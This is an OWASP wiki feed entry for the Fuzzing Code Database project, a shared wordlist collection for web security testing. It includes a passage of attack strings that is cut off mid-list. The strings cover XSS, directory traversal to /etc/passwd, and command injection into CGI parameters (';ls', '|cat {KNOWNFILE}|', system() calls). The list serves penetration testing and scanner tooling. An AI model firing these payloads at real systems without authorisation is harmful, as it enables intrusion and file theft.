| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80292</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80292"/>
				<updated>2010-03-22T12:48:12Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft URLs (18 March 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
